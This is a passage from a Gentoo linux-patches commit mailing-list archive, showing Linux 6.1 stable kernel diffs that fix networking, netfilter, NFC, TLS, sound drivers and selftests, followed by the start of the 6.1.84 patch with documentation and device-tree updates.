+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -816,6 +816,8 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	return child;
+ 
+ fallback:
++	if (fallback)
++		SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_MPCAPABLEPASSIVEFALLBACK);
+ 	mptcp_subflow_drop_ctx(child);
+ 	return child;
+ }
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 2a5d9075a081d..8d38cd5047692 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -2372,6 +2372,9 @@ static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+ 		struct nft_stats __percpu *stats = NULL;
+ 		struct nft_chain_hook hook;
+ 
++		if (table->flags & __NFT_TABLE_F_UPDATE)
++			return -EINVAL;
++
+ 		if (flags & NFT_CHAIN_BINDING)
+ 			return -EOPNOTSUPP;
+ 
+@@ -7838,11 +7841,12 @@ static int nft_flowtable_parse_hook(const struct nft_ctx *ctx,
+ 	return err;
+ }
+ 
++/* call under rcu_read_lock */
+ static const struct nf_flowtable_type *__nft_flowtable_type_get(u8 family)
+ {
+ 	const struct nf_flowtable_type *type;
+ 
+-	list_for_each_entry(type, &nf_tables_flowtables, list) {
++	list_for_each_entry_rcu(type, &nf_tables_flowtables, list) {
+ 		if (family == type->family)
+ 			return type;
+ 	}
+@@ -7854,9 +7858,13 @@ nft_flowtable_type_get(struct net *net, u8 family)
+ {
+ 	const struct nf_flowtable_type *type;
+ 
++	rcu_read_lock();
+ 	type = __nft_flowtable_type_get(family);
+-	if (type != NULL && try_module_get(type->owner))
++	if (type != NULL && try_module_get(type->owner)) {
++		rcu_read_unlock();
+ 		return type;
++	}
++	rcu_read_unlock();
+ 
+ 	lockdep_nfnl_nft_mutex_not_held();
+ #ifdef CONFIG_MODULES
+@@ -10978,6 +10986,7 @@ static void __exit nf_tables_module_exit(void)
+ 	unregister_netdevice_notifier(&nf_tables_flowtable_notifier);
+ 	nft_chain_filter_fini();
+ 	nft_chain_route_fini();
++	nf_tables_trans_destroy_flush_work();
+ 	unregister_pernet_subsys(&nf_tables_net_ops);
+ 	cancel_work_sync(&trans_gc_work);
+ 	cancel_work_sync(&trans_destroy_work);
+diff --git a/net/nfc/nci/core.c b/net/nfc/nci/core.c
+index b5071a2f597d4..f76a2d8060340 100644
+--- a/net/nfc/nci/core.c
++++ b/net/nfc/nci/core.c
+@@ -1512,6 +1512,11 @@ static void nci_rx_work(struct work_struct *work)
+ 		nfc_send_to_raw_sock(ndev->nfc_dev, skb,
+ 				     RAW_PAYLOAD_NCI, NFC_DIRECTION_RX);
+ 
++		if (!nci_plen(skb->data)) {
++			kfree_skb(skb);
++			break;
++		}
++
+ 		/* Process frame */
+ 		switch (nci_mt(skb->data)) {
+ 		case NCI_MT_RSP_PKT:
+diff --git a/net/rds/rdma.c b/net/rds/rdma.c
+index a4e3c5de998be..00dbcd4d28e68 100644
+--- a/net/rds/rdma.c
++++ b/net/rds/rdma.c
+@@ -302,7 +302,7 @@ static int __rds_rdma_map(struct rds_sock *rs, struct rds_get_mr_args *args,
+ 		}
+ 		ret = PTR_ERR(trans_private);
+ 		/* Trigger connection so that its ready for the next retry */
+-		if (ret == -ENODEV)
++		if (ret == -ENODEV && cp)
+ 			rds_conn_connect_if_down(cp->cp_conn);
+ 		goto out;
+ 	}
+diff --git a/net/sched/act_skbmod.c b/net/sched/act_skbmod.c
+index d98758a639340..744ff9729469e 100644
+--- a/net/sched/act_skbmod.c
++++ b/net/sched/act_skbmod.c
+@@ -239,13 +239,13 @@ static int tcf_skbmod_dump(struct sk_buff *skb, struct tc_action *a,
+ 	struct tcf_skbmod *d = to_skbmod(a);
+ 	unsigned char *b = skb_tail_pointer(skb);
+ 	struct tcf_skbmod_params  *p;
+-	struct tc_skbmod opt = {
+-		.index   = d->tcf_index,
+-		.refcnt  = refcount_read(&d->tcf_refcnt) - ref,
+-		.bindcnt = atomic_read(&d->tcf_bindcnt) - bind,
+-	};
++	struct tc_skbmod opt;
+ 	struct tcf_t t;
+ 
++	memset(&opt, 0, sizeof(opt));
++	opt.index   = d->tcf_index;
++	opt.refcnt  = refcount_read(&d->tcf_refcnt) - ref,
++	opt.bindcnt = atomic_read(&d->tcf_bindcnt) - bind;
+ 	spin_lock_bh(&d->tcf_lock);
+ 	opt.action = d->tcf_action;
+ 	p = rcu_dereference_protected(d->skbmod_p,
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index e8f988e1c7e64..334a563e0bc14 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -806,7 +806,7 @@ void qdisc_tree_reduce_backlog(struct Qdisc *sch, int n, int len)
+ 		notify = !sch->q.qlen && !WARN_ON_ONCE(!n &&
+ 						       !qdisc_is_offloaded);
+ 		/* TODO: perform the search on a per txq basis */
+-		sch = qdisc_lookup(qdisc_dev(sch), TC_H_MAJ(parentid));
++		sch = qdisc_lookup_rcu(qdisc_dev(sch), TC_H_MAJ(parentid));
+ 		if (sch == NULL) {
+ 			WARN_ON_ONCE(parentid != TC_H_ROOT);
+ 			break;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index bdb5153f3788a..348abadbc2d82 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2062,10 +2062,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return sock_recv_errqueue(sk, msg, len, SOL_IP, IP_RECVERR);
+ 
+-	psock = sk_psock_get(sk);
+ 	err = tls_rx_reader_lock(sk, ctx, flags & MSG_DONTWAIT);
+ 	if (err < 0)
+ 		return err;
++	psock = sk_psock_get(sk);
+ 	bpf_strp_enabled = sk_psock_strp_enabled(psock);
+ 
+ 	/* If crypto failed the connection is broken */
+@@ -2238,12 +2238,15 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		}
+ 
+ 		/* Drain records from the rx_list & copy if required */
+-		if (is_peek || is_kvec)
++		if (is_peek)
+ 			err = process_rx_list(ctx, msg, &control, copied + peeked,
+ 					      decrypted - peeked, is_peek, NULL);
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek, NULL);
++
++		/* we could have copied less than we wanted, and possibly nothing */
++		decrypted += max(err, 0) - async_copy_bytes;
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/vmw_vsock/virtio_transport.c b/net/vmw_vsock/virtio_transport.c
+index 16575ea836590..5434c9f11d28d 100644
+--- a/net/vmw_vsock/virtio_transport.c
++++ b/net/vmw_vsock/virtio_transport.c
+@@ -109,7 +109,6 @@ virtio_transport_send_pkt_work(struct work_struct *work)
+ 		if (!skb)
+ 			break;
+ 
+-		virtio_transport_deliver_tap_pkt(skb);
+ 		reply = virtio_vsock_skb_reply(skb);
+ 
+ 		sg_init_one(&hdr, virtio_vsock_hdr(skb), sizeof(*virtio_vsock_hdr(skb)));
+@@ -128,6 +127,8 @@ virtio_transport_send_pkt_work(struct work_struct *work)
+ 			break;
+ 		}
+ 
++		virtio_transport_deliver_tap_pkt(skb);
++
+ 		if (reply) {
+ 			struct virtqueue *rx_vq = vsock->vqs[VSOCK_VQ_RX];
+ 			int val;
+diff --git a/scripts/bpf_doc.py b/scripts/bpf_doc.py
+index 4de98b7bbea95..c2da6ed32104f 100755
+--- a/scripts/bpf_doc.py
++++ b/scripts/bpf_doc.py
+@@ -396,8 +396,8 @@ class PrinterRST(Printer):
+             version = version.stdout.decode().rstrip()
+         except:
+             try:
+-                version = subprocess.run(['make', 'kernelversion'], cwd=linuxRoot,
+-                                         capture_output=True, check=True)
++                version = subprocess.run(['make', '-s', '--no-print-directory', 'kernelversion'],
++                                         cwd=linuxRoot, capture_output=True, check=True)
+                 version = version.stdout.decode().rstrip()
+             except:
+                 return 'Linux'
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index fb12034d464ee..e8cf38dc8a5e0 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9905,7 +9905,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1254, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x12cc, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+-	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_HEADSET_MODE),
++	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc109, "Samsung Ativ book 9 (NP900X3G)", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc169, "Samsung Notebook 9 Pen (NP930SBE-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc176, "Samsung Notebook 9 Pro (NP930MBE-K04US)", ALC298_FIXUP_SAMSUNG_AMP),
+@@ -10121,6 +10121,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d05, 0x1147, "TongFang GMxTGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x115c, "TongFang GMxTGxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x121b, "TongFang GMxAGxx", ALC269_FIXUP_NO_SHUTUP),
++	SND_PCI_QUIRK(0x1d05, 0x1387, "TongFang GMxIXxx", ALC2XX_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1602, "RedmiBook", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1701, "XiaomiNotebook Pro", ALC298_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+diff --git a/sound/soc/codecs/rt5682-sdw.c b/sound/soc/codecs/rt5682-sdw.c
+index 868a61c8b0608..7685011a09354 100644
+--- a/sound/soc/codecs/rt5682-sdw.c
++++ b/sound/soc/codecs/rt5682-sdw.c
+@@ -787,12 +787,12 @@ static int __maybe_unused rt5682_dev_resume(struct device *dev)
+ 		return 0;
+ 
+ 	if (!slave->unattach_request) {
++		mutex_lock(&rt5682->disable_irq_lock);
+ 		if (rt5682->disable_irq == true) {
+-			mutex_lock(&rt5682->disable_irq_lock);
+ 			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
+ 			rt5682->disable_irq = false;
+-			mutex_unlock(&rt5682->disable_irq_lock);
+ 		}
++		mutex_unlock(&rt5682->disable_irq_lock);
+ 		goto regmap_sync;
+ 	}
+ 
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index 487d3010ddc19..931dbc68548ee 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -443,13 +443,13 @@ static int __maybe_unused rt711_sdca_dev_resume(struct device *dev)
+ 		return 0;
+ 
+ 	if (!slave->unattach_request) {
++		mutex_lock(&rt711->disable_irq_lock);
+ 		if (rt711->disable_irq == true) {
+-			mutex_lock(&rt711->disable_irq_lock);
+ 			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK1, SDW_SCP_SDCA_INTMASK_SDCA_0);
+ 			sdw_write_no_pm(slave, SDW_SCP_SDCA_INTMASK2, SDW_SCP_SDCA_INTMASK_SDCA_8);
+ 			rt711->disable_irq = false;
+-			mutex_unlock(&rt711->disable_irq_lock);
+ 		}
++		mutex_unlock(&rt711->disable_irq_lock);
+ 		goto regmap_sync;
+ 	}
+ 
+diff --git a/sound/soc/codecs/rt711-sdw.c b/sound/soc/codecs/rt711-sdw.c
+index 9545b8a7eb192..af7a0ab5669f4 100644
+--- a/sound/soc/codecs/rt711-sdw.c
++++ b/sound/soc/codecs/rt711-sdw.c
+@@ -542,12 +542,12 @@ static int __maybe_unused rt711_dev_resume(struct device *dev)
+ 		return 0;
+ 
+ 	if (!slave->unattach_request) {
++		mutex_lock(&rt711->disable_irq_lock);
+ 		if (rt711->disable_irq == true) {
+-			mutex_lock(&rt711->disable_irq_lock);
+ 			sdw_write_no_pm(slave, SDW_SCP_INTMASK1, SDW_SCP_INT1_IMPL_DEF);
+ 			rt711->disable_irq = false;
+-			mutex_unlock(&rt711->disable_irq_lock);
+ 		}
++		mutex_unlock(&rt711->disable_irq_lock);
+ 		goto regmap_sync;
+ 	}
+ 
+diff --git a/sound/soc/soc-ops.c b/sound/soc/soc-ops.c
+index 2d25748ca7066..b27e89ff6a167 100644
+--- a/sound/soc/soc-ops.c
++++ b/sound/soc/soc-ops.c
+@@ -263,7 +263,7 @@ int snd_soc_get_volsw(struct snd_kcontrol *kcontrol,
+ 	int max = mc->max;
+ 	int min = mc->min;
+ 	int sign_bit = mc->sign_bit;
+-	unsigned int mask = (1 << fls(max)) - 1;
++	unsigned int mask = (1ULL << fls(max)) - 1;
+ 	unsigned int invert = mc->invert;
+ 	int val;
+ 	int ret;
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index 18c9b00ca058e..dacf4cf2246da 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -439,6 +439,7 @@ do_transfer()
+ 	local stat_cookierx_last=$(get_mib_counter "${listener_ns}" "TcpExtSyncookiesRecv")
+ 	local stat_csum_err_s=$(get_mib_counter "${listener_ns}" "MPTcpExtDataCsumErr")
+ 	local stat_csum_err_c=$(get_mib_counter "${connector_ns}" "MPTcpExtDataCsumErr")
++	local stat_tcpfb_last_l=$(get_mib_counter "${listener_ns}" "MPTcpExtMPCapableFallbackACK")
+ 
+ 	timeout ${timeout_test} \
+ 		ip netns exec ${listener_ns} \
+@@ -504,6 +505,7 @@ do_transfer()
+ 	local stat_cookietx_now=$(get_mib_counter "${listener_ns}" "TcpExtSyncookiesSent")
+ 	local stat_cookierx_now=$(get_mib_counter "${listener_ns}" "TcpExtSyncookiesRecv")
+ 	local stat_ooo_now=$(get_mib_counter "${listener_ns}" "TcpExtTCPOFOQueue")
++	local stat_tcpfb_now_l=$(get_mib_counter "${listener_ns}" "MPTcpExtMPCapableFallbackACK")
+ 
+ 	expect_synrx=$((stat_synrx_last_l))
+ 	expect_ackrx=$((stat_ackrx_last_l))
+@@ -548,6 +550,11 @@ do_transfer()
+ 		fi
+ 	fi
+ 
++	if [ ${stat_ooo_now} -eq 0 ] && [ ${stat_tcpfb_last_l} -ne ${stat_tcpfb_now_l} ]; then
++		printf "[ FAIL ]\nunexpected fallback to TCP"
++		rets=1
++	fi
++
+ 	if [ $retc -eq 0 ] && [ $rets -eq 0 ]; then
+ 		printf "[ OK ]"
+ 	fi
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a20dca9d26d68..635a1624b47dc 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -725,7 +725,7 @@ pm_nl_check_endpoint()
+ 			[ -n "$_flags" ]; flags="flags $_flags"
+ 			shift
+ 		elif [ $1 = "dev" ]; then
+-			[ -n "$2" ]; dev="dev $1"
++			[ -n "$2" ]; dev="dev $2"
+ 			shift
+ 		elif [ $1 = "id" ]; then
+ 			_id=$2
+@@ -1771,7 +1771,10 @@ chk_rm_nr()
+ 		# in case of simult flush, the subflow removal count on each side is
+ 		# unreliable
+ 		count=$((count + cnt))
+-		[ "$count" != "$rm_subflow_nr" ] && suffix="$count in [$rm_subflow_nr:$((rm_subflow_nr*2))]"
++		if [ "$count" != "$rm_subflow_nr" ]; then
++			suffix="$count in [$rm_subflow_nr:$((rm_subflow_nr*2))]"
++			extra_msg="$extra_msg simult"
++		fi
+ 		if [ $count -ge "$rm_subflow_nr" ] && \
+ 		   [ "$count" -le "$((rm_subflow_nr *2 ))" ]; then
+ 			echo -n "[ ok ] $suffix"
+diff --git a/tools/testing/selftests/net/reuseaddr_conflict.c b/tools/testing/selftests/net/reuseaddr_conflict.c
+index 7c5b12664b03b..bfb07dc495186 100644
+--- a/tools/testing/selftests/net/reuseaddr_conflict.c
++++ b/tools/testing/selftests/net/reuseaddr_conflict.c
+@@ -109,6 +109,6 @@ int main(void)
+ 	fd1 = open_port(0, 1);
+ 	if (fd1 >= 0)
+ 		error(1, 0, "Was allowed to create an ipv4 reuseport on an already bound non-reuseport socket with no ipv6");
+-	fprintf(stderr, "Success");
++	fprintf(stderr, "Success\n");
+ 	return 0;
+ }
+diff --git a/tools/testing/selftests/net/udpgro_fwd.sh b/tools/testing/selftests/net/udpgro_fwd.sh
+index 9690a5d7ffd7d..9e9b4644e0ea3 100755
+--- a/tools/testing/selftests/net/udpgro_fwd.sh
++++ b/tools/testing/selftests/net/udpgro_fwd.sh
+@@ -239,7 +239,7 @@ for family in 4 6; do
+ 
+ 	create_vxlan_pair
+ 	ip netns exec $NS_DST ethtool -K veth$DST rx-gro-list on
+-	run_test "GRO frag list over UDP tunnel" $OL_NET$DST 1 1
++	run_test "GRO frag list over UDP tunnel" $OL_NET$DST 10 10
+ 	cleanup
+ 
+ 	# use NAT to circumvent GRO FWD check
+@@ -252,13 +252,7 @@ for family in 4 6; do
+ 	# load arp cache before running the test to reduce the amount of
+ 	# stray traffic on top of the UDP tunnel
+ 	ip netns exec $NS_SRC $PING -q -c 1 $OL_NET$DST_NAT >/dev/null
+-	run_test "GRO fwd over UDP tunnel" $OL_NET$DST_NAT 1 1 $OL_NET$DST
+-	cleanup
+-
+-	create_vxlan_pair
+-	run_bench "UDP tunnel fwd perf" $OL_NET$DST
+-	ip netns exec $NS_DST ethtool -K veth$DST rx-udp-gro-forwarding on
+-	run_bench "UDP tunnel GRO fwd perf" $OL_NET$DST
++	run_test "GRO fwd over UDP tunnel" $OL_NET$DST_NAT 10 10 $OL_NET$DST
+ 	cleanup
+ done
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-03 13:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-03 13:54 UTC (permalink / raw
  To: gentoo-commits

commit:     49f3e7368a76630fdfb6726d27a5553807a9a4a3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Apr  3 13:53:57 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Apr  3 13:53:57 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=49f3e736

Linux patch 6.1.84

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1083_linux-6.1.84.patch | 11214 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11218 insertions(+)

diff --git a/0000_README b/0000_README
index 3e406bb1..55224b04 100644
--- a/0000_README
+++ b/0000_README
@@ -375,6 +375,10 @@ Patch:  1082_linux-6.1.83.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.83
 
+Patch:  1083_linux-6.1.84.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.84
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1083_linux-6.1.84.patch b/1083_linux-6.1.84.patch
new file mode 100644
index 00000000..cb20facb
--- /dev/null
+++ b/1083_linux-6.1.84.patch
@@ -0,0 +1,11214 @@
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index a39bbfe9526b6..32a8893e56177 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -484,11 +484,14 @@ Spectre variant 2
+ 
+    Systems which support enhanced IBRS (eIBRS) enable IBRS protection once at
+    boot, by setting the IBRS bit, and they're automatically protected against
+-   Spectre v2 variant attacks, including cross-thread branch target injections
+-   on SMT systems (STIBP). In other words, eIBRS enables STIBP too.
++   Spectre v2 variant attacks.
+ 
+-   Legacy IBRS systems clear the IBRS bit on exit to userspace and
+-   therefore explicitly enable STIBP for that
++   On Intel's enhanced IBRS systems, this includes cross-thread branch target
++   injections on SMT systems (STIBP). In other words, Intel eIBRS enables
++   STIBP, too.
++
++   AMD Automatic IBRS does not protect userspace, and Legacy IBRS systems clear
++   the IBRS bit on exit to userspace, therefore both explicitly enable STIBP.
+ 
+    The retpoline mitigation is turned on by default on vulnerable
+    CPUs. It can be forced on or off by the administrator
+@@ -621,9 +624,9 @@ kernel command line.
+                 retpoline,generic       Retpolines
+                 retpoline,lfence        LFENCE; indirect branch
+                 retpoline,amd           alias for retpoline,lfence
+-                eibrs                   enhanced IBRS
+-                eibrs,retpoline         enhanced IBRS + Retpolines
+-                eibrs,lfence            enhanced IBRS + LFENCE
++                eibrs                   Enhanced/Auto IBRS
++                eibrs,retpoline         Enhanced/Auto IBRS + Retpolines
++                eibrs,lfence            Enhanced/Auto IBRS + LFENCE
+                 ibrs                    use IBRS to protect kernel
+ 
+ 		Not specifying this option is equivalent to
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 2dfe75104e7de..88dffaf8f0a99 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -3206,9 +3206,7 @@
+ 
+ 	mem_encrypt=	[X86-64] AMD Secure Memory Encryption (SME) control
+ 			Valid arguments: on, off
+-			Default (depends on kernel configuration option):
+-			  on  (CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT=y)
+-			  off (CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT=n)
++			Default: off
+ 			mem_encrypt=on:		Activate SME
+ 			mem_encrypt=off:	Do not activate SME
+ 
+@@ -5765,9 +5763,9 @@
+ 			retpoline,generic - Retpolines
+ 			retpoline,lfence  - LFENCE; indirect branch
+ 			retpoline,amd     - alias for retpoline,lfence
+-			eibrs		  - enhanced IBRS
+-			eibrs,retpoline   - enhanced IBRS + Retpolines
+-			eibrs,lfence      - enhanced IBRS + LFENCE
++			eibrs		  - Enhanced/Auto IBRS
++			eibrs,retpoline   - Enhanced/Auto IBRS + Retpolines
++			eibrs,lfence      - Enhanced/Auto IBRS + LFENCE
+ 			ibrs		  - use IBRS to protect kernel
+ 
+ 			Not specifying this option is equivalent to
+diff --git a/Documentation/userspace-api/media/mediactl/media-types.rst b/Documentation/userspace-api/media/mediactl/media-types.rst
+index 0ffeece1e0c8e..6332e8395263b 100644
+--- a/Documentation/userspace-api/media/mediactl/media-types.rst
++++ b/Documentation/userspace-api/media/mediactl/media-types.rst
+@@ -375,12 +375,11 @@ Types and flags used to represent the media graph elements
+ 	  are origins of links.
+ 
+     *  -  ``MEDIA_PAD_FL_MUST_CONNECT``
+-       -  If this flag is set and the pad is linked to any other pad, then
+-	  at least one of those links must be enabled for the entity to be
+-	  able to stream. There could be temporary reasons (e.g. device
+-	  configuration dependent) for the pad to need enabled links even
+-	  when this flag isn't set; the absence of the flag doesn't imply
+-	  there is none.
++       -  If this flag is set, then for this pad to be able to stream, it must
++	  be connected by at least one enabled link. There could be temporary
++	  reasons (e.g. device configuration dependent) for the pad to need
++	  enabled links even when this flag isn't set; the absence of the flag
++	  doesn't imply there is none.
+ 
+ 
+ One and only one of ``MEDIA_PAD_FL_SINK`` and ``MEDIA_PAD_FL_SOURCE``
+diff --git a/Documentation/x86/amd-memory-encryption.rst b/Documentation/x86/amd-memory-encryption.rst
+index 934310ce72582..bace87cc9ca2c 100644
+--- a/Documentation/x86/amd-memory-encryption.rst
++++ b/Documentation/x86/amd-memory-encryption.rst
+@@ -87,14 +87,14 @@ The state of SME in the Linux kernel can be documented as follows:
+ 	  kernel is non-zero).
+ 
+ SME can also be enabled and activated in the BIOS. If SME is enabled and
+-activated in the BIOS, then all memory accesses will be encrypted and it will
+-not be necessary to activate the Linux memory encryption support.  If the BIOS
+-merely enables SME (sets bit 23 of the MSR_AMD64_SYSCFG), then Linux can activate
+-memory encryption by default (CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT=y) or
+-by supplying mem_encrypt=on on the kernel command line.  However, if BIOS does
+-not enable SME, then Linux will not be able to activate memory encryption, even
+-if configured to do so by default or the mem_encrypt=on command line parameter
+-is specified.
++activated in the BIOS, then all memory accesses will be encrypted and it
++will not be necessary to activate the Linux memory encryption support.
++
++If the BIOS merely enables SME (sets bit 23 of the MSR_AMD64_SYSCFG),
++then memory encryption can be enabled by supplying mem_encrypt=on on the
++kernel command line.  However, if BIOS does not enable SME, then Linux
++will not be able to activate memory encryption, even if configured to do
++so by default or the mem_encrypt=on command line parameter is specified.
+ 
+ Secure Nested Paging (SNP)
+ ==========================
+diff --git a/Makefile b/Makefile
+index 38657b3dda2cd..0e33150db2bfc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 83
++SUBLEVEL = 84
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/mmp2-brownstone.dts b/arch/arm/boot/dts/mmp2-brownstone.dts
+index 04f1ae1382e7a..bc64348b82185 100644
+--- a/arch/arm/boot/dts/mmp2-brownstone.dts
++++ b/arch/arm/boot/dts/mmp2-brownstone.dts
+@@ -28,7 +28,7 @@ &uart3 {
+ &twsi1 {
+ 	status = "okay";
+ 	pmic: max8925@3c {
+-		compatible = "maxium,max8925";
++		compatible = "maxim,max8925";
+ 		reg = <0x3c>;
+ 		interrupts = <1>;
+ 		interrupt-parent = <&intcmux4>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 04106d7254000..b5cd24d59ad9a 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2028,8 +2028,16 @@ pcie1: pci@1c08000 {
+ 			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+-			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "msi";
++			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 308 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 309 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 312 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 313 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 314 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 374 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 375 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "msi0", "msi1", "msi2", "msi3",
++					  "msi4", "msi5", "msi6", "msi7";
+ 			#interrupt-cells = <1>;
+ 			interrupt-map-mask = <0 0 0 0x7>;
+ 			interrupt-map = <0 0 0 1 &intc 0 0 0 434 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/hexagon/kernel/vmlinux.lds.S b/arch/hexagon/kernel/vmlinux.lds.S
+index 57465bff1fe49..df7f349c8d4f3 100644
+--- a/arch/hexagon/kernel/vmlinux.lds.S
++++ b/arch/hexagon/kernel/vmlinux.lds.S
+@@ -64,6 +64,7 @@ SECTIONS
+ 	STABS_DEBUG
+ 	DWARF_DEBUG
+ 	ELF_DETAILS
++	.hexagon.attributes 0 : { *(.hexagon.attributes) }
+ 
+ 	DISCARDS
+ }
+diff --git a/arch/loongarch/include/asm/io.h b/arch/loongarch/include/asm/io.h
+index 402a7d9e3a53e..427d147f30d7f 100644
+--- a/arch/loongarch/include/asm/io.h
++++ b/arch/loongarch/include/asm/io.h
+@@ -72,6 +72,8 @@ extern void __memcpy_fromio(void *to, const volatile void __iomem *from, size_t
+ #define memcpy_fromio(a, c, l) __memcpy_fromio((a), (c), (l))
+ #define memcpy_toio(c, a, l)   __memcpy_toio((c), (a), (l))
+ 
++#define __io_aw() mmiowb()
++
+ #include <asm-generic/io.h>
+ 
+ #define ARCH_HAS_VALID_PHYS_ADDR_RANGE
+diff --git a/arch/loongarch/include/asm/percpu.h b/arch/loongarch/include/asm/percpu.h
+index 302f0e33975a2..c90c560941685 100644
+--- a/arch/loongarch/include/asm/percpu.h
++++ b/arch/loongarch/include/asm/percpu.h
+@@ -25,7 +25,12 @@ static inline void set_my_cpu_offset(unsigned long off)
+ 	__my_cpu_offset = off;
